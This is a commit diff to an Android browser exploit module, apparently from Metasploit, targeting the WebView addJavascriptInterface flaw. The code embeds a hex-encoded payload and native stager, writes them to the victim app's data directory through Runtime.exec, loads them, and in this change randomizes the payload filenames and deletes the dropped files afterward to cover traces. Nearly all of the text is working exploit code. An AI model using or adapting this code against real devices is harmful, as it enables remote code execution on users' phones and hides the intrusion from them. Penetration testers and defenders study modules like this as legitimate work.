Merge pull request #10 from timwr/ndkstager-fix

joevennix · joevennix · commit 8d9630a40510 · 2014-03-25T10:59:56.000-05:00
randomize payload filename
diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -86,12 +86,14 @@ def on_request_exploit(cli, req, browser)
     send_response_html(cli, html)
   end
 
-  def dalvikstager
-    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libdalvikstager.so')
-    File.read(localfile, :mode => 'rb')
+  def ndkstager(stagename)
+    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so')
+    data = File.read(localfile, :mode => 'rb')
+    data.gsub!('PLOAD', stagename)
   end
 
   def js
+    stagename = Rex::Text.rand_text_alpha(5)
     %Q|
       function exec(obj) {
         // ensure that the object contains a native interface
@@ -101,14 +103,15 @@ def js
         var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
         var runtime = m.invoke(null, null);
         var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
-        var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}";
+        var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}";
 
         // get the process name, which will give us our data path
         var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
         var ch, path = '/data/data/';
         while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
         var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
-        var stagePath = path + '/stage.apk';
+        var stagePath = path + '/#{stagename}.apk';
+        var dexPath = path + '/#{stagename}.dex';
 
         // build the library and chmod it
         runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
@@ -119,6 +122,9 @@ def js
         runtime.exec(['chmod', '700', stagePath]).waitFor();
 
         runtime.load(libraryPath);
+        runtime.exec(['rm', stagePath]).waitFor();
+        runtime.exec(['rm', libraryPath]).waitFor();
+        runtime.exec(['rm', dexPath]).waitFor();
 
         return true;
       }
